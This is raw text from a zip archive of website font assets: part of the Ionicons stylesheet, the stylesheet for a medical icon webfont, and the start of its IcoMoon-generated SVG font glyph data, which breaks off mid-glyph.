"}.ion-social-css3:before{content:"\f4df"}.ion-social-css3-outline:before{content:"\f4de"}.ion-social-designernews:before{content:"\f22b"}.ion-social-designernews-outline:before{content:"\f22a"}.ion-social-dribbble:before{content:"\f22d"}.ion-social-dribbble-outline:before{content:"\f22c"}.ion-social-dropbox:before{content:"\f22f"}.ion-social-dropbox-outline:before{content:"\f22e"}.ion-social-euro:before{content:"\f4e1"}.ion-social-euro-outline:before{content:"\f4e0"}.ion-social-facebook:before{content:"\f231"}.ion-social-facebook-outline:before{content:"\f230"}.ion-social-foursquare:before{content:"\f34d"}.ion-social-foursquare-outline:before{content:"\f34c"}.ion-social-freebsd-devil:before{content:"\f2c4"}.ion-social-github:before{content:"\f233"}.ion-social-github-outline:before{content:"\f232"}.ion-social-google:before{content:"\f34f"}.ion-social-google-outline:before{content:"\f34e"}.ion-social-googleplus:before{content:"\f235"}.ion-social-googleplus-outline:before{content:"\f234"}.ion-social-hackernews:before{content:"\f237"}.ion-social-hackernews-outline:before{content:"\f236"}.ion-social-html5:before{content:"\f4e3"}.ion-social-html5-outline:before{content:"\f4e2"}.ion-social-instagram:before{content:"\f351"}.ion-social-instagram-outline:before{content:"\f350"}.ion-social-javascript:before{content:"\f4e5"}.ion-social-javascript-outline:before{content:"\f4e4"}.ion-social-linkedin:before{content:"\f239"}.ion-social-linkedin-outline:before{content:"\f238"}.ion-social-markdown:before{content:"\f4e6"}.ion-social-nodejs:before{content:"\f4e7"}.ion-social-octocat:before{content:"\f4e8"}.ion-social-pinterest:before{content:"\f2b1"}.ion-social-pinterest-outline:before{content:"\f2b0"}.ion-social-python:before{content:"\f4e9"}.ion-social-reddit:before{content:"\f23b"}.ion-social-reddit-outline:before{content:"\f23a"}.ion-social-rss:before{content:"\f23d"}.ion-social-rss-outline:before{content:"\f23c"}.ion-social-sass:before{content:"\f4ea"}.ion-social-skype:before{content:"\f23f"}.ion-social-skype-outline:before{content:"\f23e"}.ion-social-snapchat:before{content:"\f4ec"}.ion-social-snapchat-outline:before{content:"\f4eb"}.ion-social-tumblr:before{content:"\f241"}.ion-social-tumblr-outline:before{content:"\f240"}.ion-social-tux:before{content:"\f2c5"}.ion-social-twitch:before{content:"\f4ee"}.ion-social-twitch-outline:before{content:"\f4ed"}.ion-social-twitter:before{content:"\f243"}.ion-social-twitter-outline:before{content:"\f242"}.ion-social-usd:before{content:"\f353"}.ion-social-usd-outline:before{content:"\f352"}.ion-social-vimeo:before{content:"\f245"}.ion-social-vimeo-outline:before{content:"\f244"}.ion-social-whatsapp:before{content:"\f4f0"}.ion-social-whatsapp-outline:before{content:"\f4ef"}.ion-social-windows:before{content:"\f247"}.ion-social-windows-outline:before{content:"\f246"}.ion-social-wordpress:before{content:"\f249"}.ion-social-wordpress-outline:before{content:"\f248"}.ion-social-yahoo:before{content:"\f24b"}.ion-social-yahoo-outline:before{content:"\f24a"}.ion-social-yen:before{content:"\f4f2"}.ion-social-yen-outline:before{content:"\f4f1"}.ion-social-youtube:before{content:"\f24d"}.ion-social-youtube-outline:before{content:"\f24c"}.ion-soup-can:before{content:"\f4f4"}.ion-soup-can-outline:before{content:"\f4f3"}.ion-speakerphone:before{content:"\f2b2"}.ion-speedometer:before{content:"\f2b3"}.ion-spoon:before{content:"\f2b4"}.ion-star:before{content:"\f24e"}.ion-stats-bars:before{content:"\f2b5"}.ion-steam:before{content:"\f30b"}.ion-stop:before{content:"\f24f"}.ion-thermometer:before{content:"\f2b6"}.ion-thumbsdown:before{content:"\f250"}.ion-thumbsup:before{content:"\f251"}.ion-toggle:before{content:"\f355"}.ion-toggle-filled:before{content:"\f354"}.ion-transgender:before{content:"\f4f5"}.ion-trash-a:before{content:"\f252"}.ion-trash-b:before{content:"\f253"}.ion-trophy:before{content:"\f356"}.ion-tshirt:before{content:"\f4f7"}.ion-tshirt-outline:before{content:"\f4f6"}.ion-umbrella:before{content:"\f2b7"}.ion-university:before{content:"\f357"}.ion-unlocked:before{content:"\f254"}.ion-upload:before{content:"\f255"}.ion-usb:before{content:"\f2b8"}.ion-videocamera:before{content:"\f256"}.ion-volume-high:before{content:"\f257"}.ion-volume-low:before{content:"\f258"}.ion-volume-medium:before{content:"\f259"}.ion-volume-mute:before{content:"\f25a"}.ion-wand:before{content:"\f358"}.ion-waterdrop:before{content:"\f25b"}.ion-wifi:before{content:"\f25c"}.ion-wineglass:before{content:"\f2b9"}.ion-woman:before{content:"\f25d"}.ion-wrench:before{content:"\f2ba"}.ion-xbox:before{content:"\f30c"}
PK!J���#�#9it_sanctum/fonts/webfont-medical-icons/css/wfmi-style.cssnu&1i�@font-face {
	font-family: 'webfont-medical-icons';
	src:url('../fonts/webfont-medical-icons.eot');
	src:url('../fonts/webfont-medical-icons.eot?#iefix') format('embedded-opentype'),
		url('../fonts/webfont-medical-icons.ttf') format('truetype'),
		url('../fonts/webfont-medical-icons.woff') format('woff'),
		url('../fonts/webfont-medical-icons.svg#webfont-medical-icons') format('svg');
	font-weight: normal;
	font-style: normal;
}

[class^="medical-icon-"], [class*=" medical-icon-"] {
	font-family: 'webfont-medical-icons';
	speak: none;
	font-style: normal;
	font-weight: normal;
	font-variant: normal;
	text-transform: none;
	line-height: 1;

	/* Better Font Rendering =========== */
	-webkit-font-smoothing: antialiased;
	-moz-osx-font-smoothing: grayscale;
}

.medical-icon-i-womens-health:before {
	content: "\e600";
}
.medical-icon-i-waiting-area:before {
	content: "\e601";
}
.medical-icon-i-volume-control:before {
	content: "\e602";
}
.medical-icon-i-ultrasound:before {
	content: "\e603";
}
.medical-icon-i-text-telephone:before {
	content: "\e604";
}
.medical-icon-i-surgery:before {
	content: "\e605";
}
.medical-icon-i-stairs:before {
	content: "\e606";
}
.medical-icon-i-radiology:before {
	content: "\e607";
}
.medical-icon-i-physical-therapy:before {
	content: "\e608";
}
.medical-icon-i-pharmacy:before {
	content: "\e609";
}
.medical-icon-i-pediatrics:before {
	content: "\e60a";
}
.medical-icon-i-pathology:before {
	content: "\e60b";
}
.medical-icon-i-outpatient:before {
	content: "\e60c";
}
.medical-icon-i-mental-health:before {
	content: "\e60d";
}
.medical-icon-i-medical-records:before {
	content: "\e60e";
}
.medical-icon-i-medical-library:before {
	content: "\e60f";
}
.medical-icon-i-mammography:before {
	content: "\e610";
}
.medical-icon-i-laboratory:before {
	content: "\e611";
}
.medical-icon-i-labor-delivery:before {
	content: "\e612";
}
.medical-icon-i-immunizations:before {
	content: "\e613";
}
.medical-icon-i-imaging-root-category:before {
	content: "\e614";
}
.medical-icon-i-imaging-alternative-pet:before {
	content: "\e615";
}
.medical-icon-i-imaging-alternative-mri:before {
	content: "\e616";
}
.medical-icon-i-imaging-alternative-mri-two:before {
	content: "\e617";
}
.medical-icon-i-imaging-alternative-ct:before {
	content: "\e618";
}
.medical-icon-i-fire-extinguisher:before {
	content: "\e619";
}
.medical-icon-i-family-practice:before {
	content: "\e61a";
}
.medical-icon-i-emergency:before {
	content: "\e61b";
}
.medical-icon-i-elevators:before {
	content: "\e61c";
}
.medical-icon-i-ear-nose-throat:before {
	content: "\e61d";
}
.medical-icon-i-drinking-fountain:before {
	content: "\e61e";
}
.medical-icon-i-cardiology:before {
	content: "\e61f";
}
.medical-icon-i-billing:before {
	content: "\e620";
}
.medical-icon-i-anesthesia:before {
	content: "\e621";
}
.medical-icon-i-ambulance:before {
	content: "\e622";
}
.medical-icon-i-alternative-complementary:before {
	content: "\e623";
}
.medical-icon-i-administration:before {
	content: "\e624";
}
.medical-icon-i-social-services:before {
	content: "\e625";
}
.medical-icon-i-smoking:before {
	content: "\e626";
}
.medical-icon-i-restrooms:before {
	content: "\e627";
}
.medical-icon-i-restaurant:before {
	content: "\e628";
}
.medical-icon-i-respiratory:before {
	content: "\e629";
}
.medical-icon-i-registration:before {
	content: "\e62a";
}
.medical-icon-i-oncology:before {
	content: "\e62b";
}
.medical-icon-i-nutrition:before {
	content: "\e62c";
}
.medical-icon-i-nursery:before {
	content: "\e62d";
}
.medical-icon-i-no-smoking:before {
	content: "\e62e";
}
.medical-icon-i-neurology:before {
	content: "\e62f";
}
.medical-icon-i-mri-pet:before {
	content: "\e630";
}
.medical-icon-i-interpreter-services:before {
	content: "\e631";
}
.medical-icon-i-internal-medicine:before {
	content: "\e632";
}
.medical-icon-i-intensive-care:before {
	content: "\e633";
}
.medical-icon-i-inpatient:before {
	content: "\e634";
}
.medical-icon-i-information-us:before {
	content: "\e635";
}
.medical-icon-i-infectious-diseases:before {
	content: "\e636";
}
.medical-icon-i-hearing-assistance:before {
	content: "\e637";
}
.medical-icon-i-health-services:before {
	content: "\e638";
}
.medical-icon-i-health-education:before {
	content: "\e639";
}
.medical-icon-i-gift-shop:before {
	content: "\e63a";
}
.medical-icon-i-genetics:before {
	content: "\e63b";
}
.medical-icon-i-first-aid:before {
	content: "\e63c";
}
.medical-icon-i-dermatology:before {
	content: "\e63d";
}
.medical-icon-i-dental:before {
	content: "\e63e";
}
.medical-icon-i-coffee-shop:before {
	content: "\e63f";
}
.medical-icon-i-chapel:before {
	content: "\e640";
}
.medical-icon-i-cath-lab:before {
	content: "\e641";
}
.medical-icon-i-care-staff-area:before {
	content: "\e642";
}
.medical-icon-i-accessibility:before {
	content: "\e643";
}
.medical-icon-i-diabetes-education:before {
	content: "\e644";
}
.medical-icon-i-hospital:before {
	content: "\e645";
}
.medical-icon-i-kidney:before {
	content: "\e646";
}
.medical-icon-i-ophthalmology:before {
	content: "\e647";
}
.medical-icon-womens-health:before {
	content: "\e648";
}
.medical-icon-waiting-area:before {
	content: "\e649";
}
.medical-icon-volume-control:before {
	content: "\e64a";
}
.medical-icon-ultrasound:before {
	content: "\e64b";
}
.medical-icon-text-telephone:before {
	content: "\e64c";
}
.medical-icon-surgery:before {
	content: "\e64d";
}
.medical-icon-stairs:before {
	content: "\e64e";
}
.medical-icon-radiology:before {
	content: "\e64f";
}
.medical-icon-physical-therapy:before {
	content: "\e650";
}
.medical-icon-pharmacy:before {
	content: "\e651";
}
.medical-icon-pediatrics:before {
	content: "\e652";
}
.medical-icon-pathology:before {
	content: "\e653";
}
.medical-icon-outpatient:before {
	content: "\e654";
}
.medical-icon-ophthalmology:before {
	content: "\e655";
}
.medical-icon-mental-health:before {
	content: "\e656";
}
.medical-icon-medical-records:before {
	content: "\e657";
}
.medical-icon-medical-library:before {
	content: "\e658";
}
.medical-icon-mammography:before {
	content: "\e659";
}
.medical-icon-laboratory:before {
	content: "\e65a";
}
.medical-icon-labor-delivery:before {
	content: "\e65b";
}
.medical-icon-kidney:before {
	content: "\e65c";
}
.medical-icon-immunizations:before {
	content: "\e65d";
}
.medical-icon-imaging-root-category:before {
	content: "\e65e";
}
.medical-icon-imaging-alternative-pet:before {
	content: "\e65f";
}
.medical-icon-imaging-alternative-mri:before {
	content: "\e660";
}
.medical-icon-imaging-alternative-mri-two:before {
	content: "\e661";
}
.medical-icon-imaging-alternative-ct:before {
	content: "\e662";
}
.medical-icon-hospital:before {
	content: "\e663";
}
.medical-icon-fire-extinguisher:before {
	content: "\e664";
}
.medical-icon-family-practice:before {
	content: "\e665";
}
.medical-icon-emergency:before {
	content: "\e666";
}
.medical-icon-elevators:before {
	content: "\e667";
}
.medical-icon-ear-nose-throat:before {
	content: "\e668";
}
.medical-icon-drinking-fountain:before {
	content: "\e669";
}
.medical-icon-diabetes-education:before {
	content: "\e66a";
}
.medical-icon-cardiology:before {
	content: "\e66b";
}
.medical-icon-billing:before {
	content: "\e66c";
}
.medical-icon-anesthesia:before {
	content: "\e66d";
}
.medical-icon-ambulance:before {
	content: "\e66e";
}
.medical-icon-alternative-complementary:before {
	content: "\e66f";
}
.medical-icon-administration:before {
	content: "\e670";
}
.medical-icon-accessibility:before {
	content: "\e671";
}
.medical-icon-social-services:before {
	content: "\e672";
}
.medical-icon-smoking:before {
	content: "\e673";
}
.medical-icon-restrooms:before {
	content: "\e674";
}
.medical-icon-restaurant:before {
	content: "\e675";
}
.medical-icon-respiratory:before {
	content: "\e676";
}
.medical-icon-oncology:before {
	content: "\e677";
}
.medical-icon-nutrition:before {
	content: "\e678";
}
.medical-icon-nursery:before {
	content: "\e679";
}
.medical-icon-no-smoking:before {
	content: "\e67a";
}
.medical-icon-neurology:before {
	content: "\e67b";
}
.medical-icon-mri-pet:before {
	content: "\e67c";
}
.medical-icon-interpreter-services:before {
	content: "\e67d";
}
.medical-icon-internal-medicine:before {
	content: "\e67e";
}
.medical-icon-intensive-care:before {
	content: "\e67f";
}
.medical-icon-inpatient:before {
	content: "\e680";
}
.medical-icon-information-us:before {
	content: "\e681";
}
.medical-icon-infectious-diseases:before {
	content: "\e682";
}
.medical-icon-hearing-assistance:before {
	content: "\e683";
}
.medical-icon-health-services:before {
	content: "\e684";
}
.medical-icon-health-education:before {
	content: "\e685";
}
.medical-icon-gift-shop:before {
	content: "\e686";
}
.medical-icon-genetics:before {
	content: "\e687";
}
.medical-icon-first-aid:before {
	content: "\e688";
}
.medical-icon-dental:before {
	content: "\e689";
}
.medical-icon-coffee-shop:before {
	content: "\e68a";
}
.medical-icon-chapel:before {
	content: "\e68b";
}
.medical-icon-cath-lab:before {
	content: "\e68c";
}
.medical-icon-care-staff-area:before {
	content: "\e68d";
}
.medical-icon-registration:before {
	content: "\e68e";
}
.medical-icon-dermatology:before {
	content: "\e68f";
}
PK!t����J�JFit_sanctum/fonts/webfont-medical-icons/fonts/webfont-medical-icons.svgnu&1i�<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >
<svg xmlns="http://www.w3.org/2000/svg">
<metadata>Generated by IcoMoon</metadata>
<defs>
<font id="webfont-medical-icons" horiz-adv-x="1024">
<font-face units-per-em="1024" ascent="960" descent="-64" />
<missing-glyph horiz-adv-x="1024" />
<glyph unicode="&#x20;" d="" horiz-adv-x="512" />
<glyph unicode="&#xe600;" d="M514.685 702.919c-69.292 0-125.556 55.754-125.556 124.565 0 68.773 56.249 124.532 125.556 124.532 69.302 0 125.556-55.754 125.556-124.532 0.005-68.811-56.244-124.565-125.556-124.565zM854.427 122.193c-28.106-8.065-56.853 6.13-64.314 31.857l-96.091 335.617-46.896 0.071 153.657-535.495h-572.487l153.671 535.495-46.953-0.071-96.138-335.617c-7.361-25.737-36.128-39.922-64.215-31.857-28.143 8.065-45.887 32.669-36.449 64.809l98.899 344.324c39.497 137.641 154.69 133.328 154.69 133.328h245.51c0 0 115.193 4.318 154.728-133.328l98.823-344.324c9.424-32.14-8.324-56.745-36.435-64.809zM515.294 427.336c-85.11 0-154.081-68.948-154.081-154.029 0-77.319 56.957-141.359 131.242-152.387v-42.253h-46.349v-46.132h46.349v-46.297h46.104v46.297h46.325v46.132h-46.325v42.324c74.11 11.207 130.751 75.172 130.751 152.316 0 85.082-68.915 154.029-154.015 154.029zM514.515 167.91c-59.364 0-107.454 48.123-107.454 107.487 0 59.326 48.095 107.482 107.454 107.482 59.401 0 107.478-48.156 107.478-107.482 0.009-59.364-48.076-107.487-107.478-107.487z" />
<glyph unicode="&#xe601;" d="M777.529 425.262l-267.227 43.962 38.342 27.297 64.171-8.884 64.101 8.884zM612.815 930.271c53.557 0 96.99-43.401 96.99-97.032 0-53.594-34.157-97.028-96.99-97.028-53.594 0-97.065 43.433-97.065 97.028 0 53.622 43.471 97.032 97.065 97.032zM636.956 229.051v-234.473c0-29.242 23.758-52.921 52.996-52.921 29.247 0 52.963 23.678 52.963 52.921v234.473c0 29.205-23.716 52.958-52.963 52.958-29.238 0-52.996-23.753-52.996-52.958zM961.471 95.188c0-16.978-13.808-30.748-30.711-30.748h-162.433v153.544h70.254v153.432c0 16.903 13.78 30.683 30.683 30.683h61.496c16.903 0 30.711-13.78 30.711-30.683v-276.228zM611.618 64.44h-315.336c-16.978 0-30.72 13.77-30.72 30.748v276.228c0 16.903 13.742 30.683 30.72 30.683h61.463c16.94 0 30.715-13.78 30.715-30.683v-153.432h223.162v-153.544zM445.566 395.734c-4.746-28.85 14.799-56.147 43.649-60.893l231.349-38.126c28.859-4.676 56.119 14.794 60.87 43.681 4.741 28.859-14.761 56.156-43.649 60.841l-231.349 38.155c-28.85 4.704-56.086-14.799-60.87-43.658zM184.661 686.129c-75.491 0-136.884 61.393-136.884 136.921 0 75.528 61.398 136.949 136.884 136.949 75.486 0 136.959-61.421 136.959-136.949-0.005-75.528-61.468-136.921-136.959-136.921v0zM184.661 720.019c56.792 0 103.078 46.206 103.078 103.064 0 56.778-46.281 103.059-103.078 103.059-56.83 0-103.003-46.272-103.003-103.059-0.005-56.853 46.178-103.064 103.003-103.064v0zM185.363 804.974c-3.058-1.403-6.785-1.267-9.843 0.739-2.562 1.651-4.18 4.25-4.601 7.103l-0.14 79.577c0 5.704 4.638 10.31 10.301 10.31 5.69 0 10.296-4.606 10.296-10.31v0-61.739l52.785 24.857c5.097 2.459 11.283 0.248 13.705-4.882v0c2.422-5.176 0.21-11.292-4.919-13.714v0l-67.584-31.94zM612.815 659.033l125.779 20.485v-88.419c20.036-15.075 62.099-46.707 62.099-46.707 5.976-6.013 3.554-12.863 2.137-14.799-3.549-4.671-10.146-5.625-14.827-2.142l-78.376 59.238c-16.267 11.451-38.683 7.575-50.143-8.655-11.456-16.244-7.598-38.692 8.641-50.162l133.901-94.054c6.219-4.386 15.079-7.369 23.893-7.369v0c7.519 0 16.375 3.123 22.953 7.799 14.055 9.978 19.222 27.699 14.444 44.023l-49.736 146.942c-13.284 36.518-46.772 79.493-97.070 79.493h-207.442c-50.293 0-83.781-42.98-97.074-79.493l-49.727-146.937c-4.783-16.323 0.416-34.044 14.472-44.023 6.541-4.666 15.425-7.799 22.911-7.799v0c8.865 0 17.721 2.969 23.94 7.369l133.901 94.054c16.234 11.47 20.101 33.914 8.641 50.162-11.493 16.23-33.909 20.106-50.143 8.655l-78.413-59.238c-4.638-3.479-11.245-2.53-14.794 2.142-1.407 1.931-3.872 8.786 2.109 14.799 0 0 42.106 31.627 62.132 46.707v88.419l125.793-20.489z" horiz-adv-x="1019" />
<glyph unicode="&#xe602;" d="M753.196 546.385c108.169 108.484 109.066 284.428 1.574 393.341l-18.47-18.48c97.589-99.010 97.245-258.335-0.925-356.878l17.821-17.984zM700.628 885.604l17.841 17.86c87.791-89.193 86.484-231.746-1.889-320.472l0.048-0.048-17.621 17.802c78.126 78.46 79.147 205.901 1.622 284.857zM659.652 639.9l20.588-20.588c67.832 68.176 68.233 178.281 1.011 246.944l-20.712-20.712c55.811-57.214 55.506-148.907-0.887-205.643zM624.009 675.562l18.842-18.842c46.843 47.168 46.71 123.873 0.458 171.536l-18.423-18.413c35.366-37.608 35.433-97.388-0.878-134.281zM603.717 696.351c25.511 25.53 25.606 66.888 0.219 92.523l-18.403-18.394c15.255-15.246 15.255-39.955 0-55.191l-0.496-0.744 18.68-18.194zM413.176 878.248c-43.428-4.866-201.417-77.077-206.006-449.334-4.847-392.149 162.578-474.664 206.483-473.738v259.003c-36.139 0-43.428 39.364-51.661 120.572-5.495 53.732-7.089 120.257 0 186.353 4.942 46.395 13.547 91.674 51.385 91.674l-0.2 265.471zM506.824-45.272c16.753 0 28.764 13.633 28.764 28.898l0.114 0.153c0 0-0.114 201.865-0.114 201.989 0 16.028-13.004 28.65-28.764 28.65h-73.375v-259.671c0 0 73.204-0.134 73.223-0.076l0.153 0.057zM506.824 612.739c16.753 0 28.764 13.633 28.764 28.926l0.114 0.134c0 0-0.114 207.685-0.114 207.819 0 16.028-13.004 28.64-28.764 28.64h-73.375v-265.5c0 0 73.204-0.143 73.223-0.048l0.153 0.029z" />
<glyph unicode="&#xe603;" d="M883.378 81.126c26.549 32.434 35.854 77.552 20.41 119.775l-13.984 38.663h84.875v715.541h-920.661v-715.541h495.095l54.014-148.146c15.337-42.186 51.501-70.844 92.672-78.571l25.375-76.819 212.438-0.028-50.232 145.126zM806.146 467.728c-45.357-16.53-68.805-66.795-52.266-112.184l32.74-89.318h-705.954v662.232h867.398v-662.232h-68.138l-73.78 201.503zM869.353 588.415c-196.049-196.007-513.959-196.007-710.003 0l288.087 288.228c36.902-36.977 96.824-36.977 133.721 0l288.195-288.228zM664.98 646.961c31.373 21.537 39.41 64.395 18.014 95.876-21.584 31.368-64.512 39.438-95.847 17.939-31.448-21.65-39.415-64.47-17.906-95.805 21.476-31.406 64.343-39.405 95.739-18.009zM590.608 606.429c-1.409 3.983-3.208 7.788-6.346 11.067 0 0-55.954 59.040-69.773 73.564 0.916 17.549 3.114 63.028 3.114 63.028 0.742 16.318-11.983 30.311-28.385 31.054-16.356 0.808-30.321-11.809-31.049-28.235l-3.537-75.682c-0.413-8.075 2.504-16.041 8.046-21.852l25.553-27-76.73-50.65 4.134 57.945c-1.973 22.345-21.711 38.851-43.966 36.944 0 0-72.962-5.040-99.427-7.262-16.746-1.48-29.259-16.252-27.742-33.031 1.409-16.741 16.248-29.222 32.961-27.812 18.46 1.625 61.651 3.105 79.163 4.547 0 0-15.158-44.131-12.020-65.912 1.973-14.275 6.069-28.663 14.768-41.42 26.939-39.307 80.685-49.377 119.954-22.42 14.064 9.592 83.963 57.396 97.116 66.419 18.502 12.753 24.257 37.179 14.167 56.71z" />
<glyph unicode="&#xe604;" d="M666.937 591.085h78.744c15.569 0 28.217-12.629 28.217-28.198v-60.691c0-15.597-12.648-28.207-28.217-28.207h-78.744c-15.569 0-28.207 12.62-28.207 28.207v60.691c0 15.569 12.639 28.198 28.207 28.198v0zM858.785 591.085h78.725c15.597 0 28.207-12.629 28.207-28.198v-60.691c0-15.597-12.61-28.207-28.207-28.207h-78.725c-15.588 0-28.207 12.62-28.207 28.207v60.691c0.009 15.569 12.629 28.198 28.207 28.198v0zM471.192 591.085h78.763c15.569 0 28.188-12.629 28.188-28.198v-60.691c0-15.597-12.62-28.207-28.188-28.207h-78.763c-15.54 0-28.169 12.62-28.169 28.207v60.691c-0.028 15.569 12.601 28.198 28.169 28.198v0zM83.608 591.085h78.744c15.569 0 28.198-12.629 28.198-28.198v-60.691c0-15.597-12.629-28.207-28.198-28.207h-78.744c-15.569 0-28.207 12.62-28.207 28.207v60.691c0.009 15.569 12.648 28.198 28.207 28.198v0zM279.808 591.085h78.744c15.569 0 28.207-12.629 28.207-28.198v-60.691c0-15.597-12.639-28.207-28.207-28.207h-78.744c-15.569 0-28.198 12.62-28.198 28.207v60.691c0 15.569 12.629 28.198 28.198 28.198v0zM669.127 230.684h78.744c15.569 0 28.207-12.62 28.207-28.217v-60.672c0-15.569-12.639-28.217-28.207-28.217h-78.744c-15.569 0-28.188 12.648-28.188 28.217v60.672c0.009 15.569 12.629 28.217 28.188 28.217v0zM860.985 230.684h78.725c15.597 0 28.207-12.62 28.207-28.217v-60.672c0-15.569-12.61-28.217-28.207-28.217h-78.725c-15.597 0-28.207 12.648-28.207 28.217v60.672c0 15.569 12.61 28.217 28.207 28.217v0zM473.41 230.684h78.744c15.569 0 28.188-12.62 28.188-28.217v-60.672c0-15.569-12.62-28.217-28.188-28.217h-78.744c-15.597 0-28.179 12.648-28.179 28.217v60.672c-0.028 15.569 12.582 28.217 28.179 28.217v0zM85.807 230.684h78.744c15.569 0 28.207-12.62 28.207-28.217v-60.672c0-15.569-12.639-28.217-28.207-28.217h-78.744c-15.569 0-28.188 12.648-28.188 28.217v60.672c0 15.569 12.62 28.217 28.188 28.217v0zM282.008 230.684h78.734c15.578 0 28.207-12.62 28.207-28.217v-60.672c0-15.569-12.629-28.217-28.207-28.217h-78.734c-15.578 0-28.207 12.648-28.207 28.217v60.672c0.009 15.569 12.629 28.217 28.207 28.217v0zM763.202 409.306h78.744c15.569 0 28.207-12.601 28.207-28.169v-60.691c0-15.597-12.639-28.198-28.207-28.198h-78.744c-15.569 0-28.207 12.601-28.207 28.198v60.691c0.009 15.569 12.648 28.169 28.207 28.169v0zM567.457 409.306h78.772c15.569 0 28.188-12.601 28.188-28.169v-60.691c0-15.597-12.62-28.198-28.188-28.198h-78.772c-15.569 0-28.179 12.601-28.179 28.198v60.691c-0.028 15.569 12.61 28.169 28.179 28.169v0zM179.883 409.306h78.744c15.569 0 28.188-12.601 28.188-28.169v-60.691c0-15.597-12.629-28.198-28.188-28.198h-78.744c-15.569 0-28.207 12.601-28.207 28.198v60.691c0 15.569 12.639 28.169 28.207 28.169v0zM376.073 409.306h78.744c15.569 0 28.207-12.601 28.207-28.169v-60.691c0-15.597-12.639-28.198-28.207-28.198h-78.744c-15.569 0-28.188 12.601-28.188 28.198v60.691c-0.009 15.569 12.62 28.169 28.188 28.169v0zM183.457 59.525h655.379c15.578 0 28.188-12.591 28.188-28.188v-59.733c0-15.588-12.61-28.179-28.188-28.179h-655.379c-15.569 0-28.207 12.591-28.207 28.179v59.733c0 15.588 12.648 28.188 28.207 28.188v0zM934.372 755.361c-4.466 40.059-71.064 185.752-414.398 189.971-361.643 4.494-437.732-149.912-436.907-190.417h238.867c0 33.327 36.305 40.040 111.17 47.663 49.56 5.044 110.886 6.495 171.88 0 42.761-4.58 84.518-12.553 84.518-47.464l244.869 0.247zM82.65 668.966c0-15.417 12.572-26.491 26.662-26.491l0.133-0.114c0 0 186.159 0.114 186.311 0.114 14.763 0 26.406 11.975 26.406 26.52v67.679l-239.493-0.028c0 0-0.104-67.489-0.047-67.556l0.028-0.123zM689.531 668.994c0-15.417 12.563-26.491 26.662-26.491l0.104-0.142c0 0 191.564 0.142 191.678 0.142 14.782 0 26.425 11.956 26.425 26.491v67.679h-244.869c0 0-0.104-67.518-0.057-67.575l0.057-0.104z" />
<glyph unicode="&#xe605;" d="M50.938 891.14c-1.749 3.18-0.599 7.163 2.586 8.875l47.515 25.89c3.161 1.749 7.112 0.594 8.861-2.623l19.059-34.765c72.040 21.593 151.875-9.118 189.365-77.773l-92.085-50.274c15.215-27.844 4.928-62.819-22.972-78.086-27.957-15.196-62.889-4.924-78.156 22.921l-92.109-50.204c-37.523 68.617-20.284 152.366 36.958 201.246l-19.021 34.793zM699.701 264.872h309.903v-320.348h-309.903v320.348zM664.169 104.75h-250.291c-43.625 0-79.129 35.415-79.129 79.068 0 43.709 35.499 79.063 79.129 79.063h250.291v-158.131zM124.549 40.602c0 17.679 14.317 32.029 32.020 32.029h507.6v-128.103h-539.62v96.074zM317.029 200.201c0-52.72-42.83-95.452-95.606-95.452-52.808 0-95.611 42.732-95.611 95.452 0 52.692 42.798 95.414 95.611 95.414 52.785 0 95.606-42.727 95.606-95.414zM839.577 467.512l-53.781 153.1c-10.427 28.859-30.458 51.392-87.012 51.392h-248.257c-56.526 0-76.585-22.533-86.979-51.392l-53.767-153.1c-4.017-9.889-6.102-32.109 15.781-46.992l126.424-83.29c18.427-12.19 43.326-7.089 55.502 11.315 12.176 18.404 7.093 43.331-11.409 55.488l-100.333 66.135 28.247 77.908h39.094l-22.902-63.207 76.169-50.204c17.099-11.287 28.822-28.546 32.908-48.628 4.161-20.092 0.21-40.605-11.077-57.723-4.517-6.822-10.067-12.606-16.262-17.572h105.477c-6.186 4.966-11.708 10.764-16.276 17.572-11.283 17.118-15.234 37.631-11.105 57.723 4.124 20.083 15.842 37.346 32.927 48.628l76.216 50.204-22.986 63.207h39.127l28.303-77.908-100.38-66.135c-18.451-12.162-23.599-37.079-11.39-55.488s37.070-23.505 55.52-11.315l126.392 83.29c21.892 14.888 19.83 37.107 15.832 46.992zM599.377 821.858c-5.99-12.961-19.091-21.976-34.311-21.976-15.262 0-28.368 9.015-34.381 21.976h-69.249c-1.122-6.079-1.781-12.297-1.781-18.727 0-58.349 47.38-105.654 105.781-105.654 58.447 0 105.795 47.305 105.795 105.654 0 6.429-0.683 12.648-1.767 18.727h-70.086zM528.347 846.804c4.124 16.384 18.956 28.616 36.719 28.616 17.698 0 32.632-12.227 36.649-28.616h60.005c-16.651 36.546-53.44 62.015-96.279 62.015-42.798 0-79.624-25.469-96.27-62.015h59.177z" />
<glyph unicode="&#xe606;" d="M26.37 54.854h179.274v182.46h178.148v183.71h180.934v180.314h179.732v179.102h266.826v-91.378h-177.394v-179.789h-179.932v-182.346h-179.55v-181.382h-180.275v-182.918h-267.761z" horiz-adv-x="1011" />
<glyph unicode="&#xe607;" d="M809.265 54.084c0-26.464-21.438-47.851-47.832-47.851-26.427 0-47.851 21.372-47.851 47.851v41.73h95.664l0.019-41.73zM683.036-59.57h-136.042l0.207 67.142h-45.582l-0.070-67.142h-136.305v155.38h317.792zM333.636 54.084c0-26.464-21.396-47.851-47.865-47.851-26.356 0-47.794 21.372-47.794 47.851v41.73h95.659v-41.73zM523.659 948.736c68.256 0 123.556-55.334 123.556-123.622 0-68.26-55.296-123.589-123.556-123.589-68.303 0-123.632 55.329-123.632 123.589 0 68.284 55.334 123.622 123.632 123.622zM875.154 143.98h-703.046v410.859h703.046v-410.859zM765.337 520.915h-480.754v-343.547h480.749v343.547zM546.994 317.839v-30.156h88.041c3.659 0 9.047-3.288 9.047-8.991 0-51.36-6.431-75.546-33.482-75.546-28.066 0-33.83 60.759-63.605 64.756 0 0 0-45.521 0-58.143h-47.052c0 12.622 0 58.251 0 58.251-31.251-2.372-36.296-64.86-65.451-64.86-27.037 0-32.012 24.186-32.012 75.546 0 5.693 5.392 8.991 9.047 8.991h88.416v30.156h-91.54c-5.327 0-9.554 4.242-9.554 9.512 0 5.256 4.228 9.498 9.554 9.498h91.54v30.156h-103.025c-5.256 0-9.526 4.237-9.526 9.531 0 5.214 4.256 9.521 9.526 9.521h103.029v30.123h-96.707c-5.261 0-9.535 4.237-9.535 9.531 0 5.214 4.274 9.559 9.535 9.559h96.702v30.105h-75.753c-5.289 0-9.531 4.303-9.531 9.498 0 5.327 4.242 9.601 9.531 